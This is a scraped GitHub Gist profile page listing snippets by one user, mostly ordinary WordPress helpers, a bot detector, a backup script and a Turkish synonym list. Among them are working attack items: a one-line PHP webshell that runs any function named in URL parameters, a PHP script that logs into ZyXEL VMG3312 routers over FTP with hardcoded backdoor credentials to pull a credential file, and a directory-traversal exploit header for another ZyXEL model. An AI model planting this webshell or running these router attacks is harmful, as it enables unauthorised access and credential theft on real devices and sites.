Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
303 followers · 191 following
View GitHub Profile
@numanturle
numanturle / Search Block in Transient (30 Sec)
Last active January 12, 2017 07:33 — forked from serkanalgur/search_block_transient.php
// Get user IP in WordPress
function get_the_user_ip() {
if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
//check ip from share internet
$ip = $_SERVER['HTTP_CLIENT_IP'];
}else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return apply_filters( 'wpb_get_ip', $ip );
}
@numanturle
numanturle / crawler_detect.php
Created May 21, 2018 10:23 — forked from geerlingguy/crawler_detect.php
Detect crawlers/bots/spiders in PHP (simple and fast)
<?php
/**
* Check if the given user agent string is one of a crawler, spider, or bot.
*
* @param string $user_agent
* A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html))
*
* @return bool
* TRUE if the user agent is a bot, FALSE if not.
@numanturle
numanturle / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Last active June 18, 2023 16:26
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
@numanturle
numanturle / ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
Created October 28, 2018 17:43
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
@numanturle
numanturle / dizindeki bozuk türkçe karakterlerini düzeltmek için
Created November 5, 2018 09:06
aynı dizinde bulunan bozuk türkçe karakterlerini düzeltir.
@numanturle
numanturle / yedek.sh
Created November 5, 2018 09:08
#!/bin/sh
BACKUP=/tmp/backup.$$
NOW=$(date +"%Y-%m-%d")
FTPD="/yedek"
FTPS="SUNUCU"
FTPU="USER"
FTPP="PASS"
FTPPO="PORT"
DBS="dbname dbname2 mysql"
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :
@numanturle
numanturle / tr_synonymous.data
Created November 5, 2018 09:16
herkesin|her insanın
kilo verme|zayıflama
ilahiyat|tanrı bilim
masraftır|harcamadır
sevincinden|luğundan
dediğine|söylediğine
dediğini|söylediğini
başlarda|başlangıçta
rahatsızlık|hastalık
civarlarda|yörelerde
@numanturle
numanturle / 22 byte php webshell
Last active January 9, 2020 18:48
<?=$_GET[z]($_GET[x]);
@numanturle
numanturle / Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
Last active November 17, 2018 10:50
Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access - Details
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
@modem_gateway = "192.168.1.1" // default address
@numanturle
numanturle / functions.php
Created August 30, 2019 07:50
wordpress thumbnail
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
$file = get_attached_file($post_ID);
$get_file_title = get_post($post_ID);
if($get_file_title->post_parent){
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
$path = pathinfo($file);
$newfilename = $post_santize_title."-".$post_ID;